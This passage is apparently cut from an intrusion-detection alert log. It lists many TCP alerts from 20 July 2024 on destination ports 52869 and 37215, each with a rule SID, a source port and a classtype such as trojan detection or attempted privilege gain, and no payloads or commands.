                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.333805
                      SID:2831300
                      Source Port:47398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.119426
                      SID:2025132
                      Source Port:52300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.635367
                      SID:2835222
                      Source Port:33796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.983105
                      SID:2829579
                      Source Port:38428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.179280
                      SID:2831300
                      Source Port:39742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.635828
                      SID:2829579
                      Source Port:39608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:24.876750
                      SID:2835222
                      Source Port:58978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.297792
                      SID:2027339
                      Source Port:54704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.320408
                      SID:2835222
                      Source Port:58788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.211046
                      SID:2829579
                      Source Port:44780
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.783923
                      SID:2831300
                      Source Port:32792
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.403723
                      SID:2027339
                      Source Port:53572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:08.135557
                      SID:2025132
                      Source Port:53152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:47.535939
                      SID:2027339
                      Source Port:53784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:25.752492
                      SID:2025132
                      Source Port:52942
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.110860
                      SID:2835222
                      Source Port:53424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.648203
                      SID:2027339
                      Source Port:41728
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.494330
                      SID:2831300
                      Source Port:51492
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:06.988055
                      SID:2829579
                      Source Port:39754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.640312
                      SID:2835222
                      Source Port:57096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.322860
                      SID:2829579
                      Source Port:48070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.031511
                      SID:2829579
                      Source Port:44118
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.631728
                      SID:2835222
                      Source Port:33218
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.411586
                      SID:2027339
                      Source Port:55468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:58.945733
                      SID:2025132
                      Source Port:51978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.328855
                      SID:2831300
                      Source Port:33584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.684499
                      SID:2831300
                      Source Port:34566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:27.654173
                      SID:2835222
                      Source Port:35068
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.231165
                      SID:2025132
                      Source Port:38630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.270636
                      SID:2027339
                      Source Port:41154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.060991
                      SID:2829579
                      Source Port:45286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.683188
                      SID:2027339
                      Source Port:49128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2835222
                      Source Port:48934
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.221570
                      SID:2829579
                      Source Port:42574
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.202325
                      SID:2829579
                      Source Port:34146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:03:53.978924
                      SID:2025132
                      Source Port:37004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:49.921076
                      SID:2027339
                      Source Port:44200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.535137
                      SID:2027339
                      Source Port:43620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.539170
                      SID:2025132
                      Source Port:53906
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:57.022868
                      SID:2027339
                      Source Port:51944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048367
                      SID:2829579
                      Source Port:33230
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.246033
                      SID:2027339
                      Source Port:54622
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.033766
                      SID:2829579
                      Source Port:54080
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.187842
                      SID:2829579
                      Source Port:52234
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.082045
                      SID:2835222
                      Source Port:60840
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.982479
                      SID:2835222
                      Source Port:39280
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.704241
                      SID:2027339
                      Source Port:52420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:07.054782
                      SID:2829579
                      Source Port:38094
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.944379
                      SID:2027339
                      Source Port:33872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.050313
                      SID:2829579
                      Source Port:50522
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.572790
                      SID:2027339
                      Source Port:36436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.096752
                      SID:2835222
                      Source Port:59220
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.177682
                      SID:2027339
                      Source Port:58450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:10.641552
                      SID:2025132
                      Source Port:37582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.462458
                      SID:2025132
                      Source Port:56652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.158533
                      SID:2025132
                      Source Port:54570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.048214
                      SID:2835222
                      Source Port:49516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.649139
                      SID:2831300
                      Source Port:54854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.061779
                      SID:2835222
                      Source Port:46432
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.119972
                      SID:2835222
                      Source Port:44554
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.158487
                      SID:2027339
                      Source Port:50088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.161892
                      SID:2835222
                      Source Port:52752
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.313163
                      SID:2027339
                      Source Port:48230
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.005094
                      SID:2025132
                      Source Port:49358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.153608
                      SID:2835222
                      Source Port:53610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.950811
                      SID:2027339
                      Source Port:33400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:09.002255
                      SID:2831300
                      Source Port:38116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:46.725077
                      SID:2027339
                      Source Port:40848
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.928521
                      SID:2829579
                      Source Port:42742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.633744
                      SID:2829579
                      Source Port:59806
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.977603
                      SID:2829579
                      Source Port:52170
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.247958
                      SID:2835222
                      Source Port:60760
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.563416
                      SID:2027339
                      Source Port:38528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.223897
                      SID:2025132
                      Source Port:57776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:27.650871
                      SID:2829579
                      Source Port:49954
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.111275
                      SID:2831300
                      Source Port:54216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.663629
                      SID:2025132
                      Source Port:34096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.903209
                      SID:2027339
                      Source Port:48072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:53.387026
                      SID:2831300
                      Source Port:56040
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.131607
                      SID:2025132
                      Source Port:53892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.370481
                      SID:2831300
                      Source Port:56636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.818830
                      SID:2835222
                      Source Port:36700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.624686
                      SID:2831300
                      Source Port:57118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:45.134490
                      SID:2025132
                      Source Port:56872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:34.044717
                      SID:2835222
                      Source Port:59238
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.308623
                      SID:2025132
                      Source Port:58142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:46.955966
                      SID:2025132
                      Source Port:55862
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:02:07.942303
                      SID:2027339
                      Source Port:53118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.592736
                      SID:2025132
                      Source Port:35520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.887574
                      SID:2027339
                      Source Port:58218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.425298
                      SID:2831300
                      Source Port:43806
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:49.172806
                      SID:2831300
                      Source Port:35860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.462291
                      SID:2027339
                      Source Port:51560
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:21.954501
                      SID:2835222
                      Source Port:56672
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:45.074222
                      SID:2027339
                      Source Port:45436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.247233
                      SID:2027339
                      Source Port:53918
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.043969
                      SID:2835222
                      Source Port:49582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.193367
                      SID:2027339
                      Source Port:42084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.806062
                      SID:2831300
                      Source Port:46250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:01.758577
                      SID:2025132
                      Source Port:57210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:54.310738
                      SID:2025132
                      Source Port:51218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:40.372003
                      SID:2835222
                      Source Port:59172
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:06.738802
                      SID:2025132
                      Source Port:42618
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:44.940207
                      SID:2831300
                      Source Port:41092
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:50.131564
                      SID:2027339
                      Source Port:51436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.638879
                      SID:2027339
                      Source Port:56182
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:00.006558
                      SID:2831300
                      Source Port:60958
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.572790
                      SID:2831300
                      Source Port:36436
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:44.338159
                      SID:2027339
                      Source Port:49602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.484128
                      SID:2027339
                      Source Port:38784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.818830
                      SID:2835222
                      Source Port:59012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:48.177682
                      SID:2831300
                      Source Port:58450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:07.062666
                      SID:2835222
                      Source Port:41676
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.692050
                      SID:2025132
                      Source Port:42114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:02.046626
                      SID:2829579
                      Source Port:35136
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:50.798234
                      SID:2025132
                      Source Port:56576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.565610
                      SID:2831300
                      Source Port:60398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:08.567236
                      SID:2027339
                      Source Port:57386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:12.806839
                      SID:2027339
                      Source Port:58376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.943232
                      SID:2027339
                      Source Port:39244
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:40.334452
                      SID:2835222
                      Source Port:38912
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:02.537098
                      SID:2025132
                      Source Port:41216
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:00:59.203960
                      SID:2829579
                      Source Port:54948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.160211
                      SID:2027339
                      Source Port:38978
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.048214
                      SID:2025132
                      Source Port:50834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:08.691384
                      SID:2831300
                      Source Port:46394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:02.076414
                      SID:2829579
                      Source Port:58904
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:59.643531
                      SID:2027339
                      Source Port:44200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.443111
                      SID:2831300
                      Source Port:50606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:47.805449
                      SID:2027339
                      Source Port:44524
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.615311
                      SID:2025132
                      Source Port:48022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.591863
                      SID:2831300
                      Source Port:46382
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:54.515976
                      SID:2027339
                      Source Port:60950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.285526
                      SID:2027339
                      Source Port:43896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.222139
                      SID:2829579
                      Source Port:50028
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:41.263140
                      SID:2027339
                      Source Port:47540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:49.254553
                      SID:2025132
                      Source Port:48726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:11.634372
                      SID:2829579
                      Source Port:55954
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816521
                      SID:2835222
                      Source Port:42760
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:05.033018
                      SID:2027339
                      Source Port:45276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:57.321432
                      SID:2027339
                      Source Port:47342
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:02.047411
                      SID:2829579
                      Source Port:47744
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:44.766696
                      SID:2025132
                      Source Port:57578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:31.975107
                      SID:2829579
                      Source Port:46984
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:31.322217
                      SID:2027339
                      Source Port:52702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:34.045749
                      SID:2829579
                      Source Port:48132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:54.642694
                      SID:2027339
                      Source Port:36822
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:00.641498
                      SID:2835222
                      Source Port:33920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:11.816074
                      SID:2829579
                      Source Port:39208
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.693711
                      SID:2027339
                      Source Port:37946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:04.040812
                      SID:2835222
                      Source Port:58132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:03.083161
                      SID:2027339
                      Source Port:52478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.985200
                      SID:2025132
                      Source Port:48740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:55.851237
                      SID:2831300
                      Source Port:53532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:34.044152
                      SID:2829579
                      Source Port:34678
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:57.220833
                      SID:2829579
                      Source Port:33462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:20.140632
                      SID:2835222
                      Source Port:49352
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:43.906353
                      SID:2027339
                      Source Port:49662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:14.103467
                      SID:2829579
                      Source Port:55324
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.466150
                      SID:2027339
                      Source Port:58916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:20.036130
                      SID:2027339
                      Source Port:43370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:46.247879
                      SID:2027339
                      Source Port:45630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.383355
                      SID:2831300
                      Source Port:44096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:42.603963
                      SID:2025132
                      Source Port:55590
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:25.476673
                      SID:2025132
                      Source Port:39008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:45.713934
                      SID:2025132
                      Source Port:60998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:00.633810
                      SID:2835222
                      Source Port:40002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.609855
                      SID:2831300
                      Source Port:60378
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:11.632393
                      SID:2835222
                      Source Port:38378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:00:59.157444
                      SID:2835222
                      Source Port:44268
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:08.650213
                      SID:2831300
                      Source Port:44102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:50.901722
                      SID:2025132
                      Source Port:58344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:20.140632
                      SID:2835222
                      Source Port:43374
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:47.028157
                      SID:2025132
                      Source Port:54620
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:41.280928
                      SID:2025132
                      Source Port:43900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:01:53.392805
                      SID:2027339
                      Source Port:54570
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:02:43.072508
                      SID:2027339
                      Source Port:43146
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:42.617689
                      SID:2027339
                      Source Port:60852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:01:55.105161
                      SID:2831300
                      Source Port:40212
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:01:31.991548
                      SID:2835222
                      Source Port:44750
                      Destination Port:37215
                      Protocol:TCP
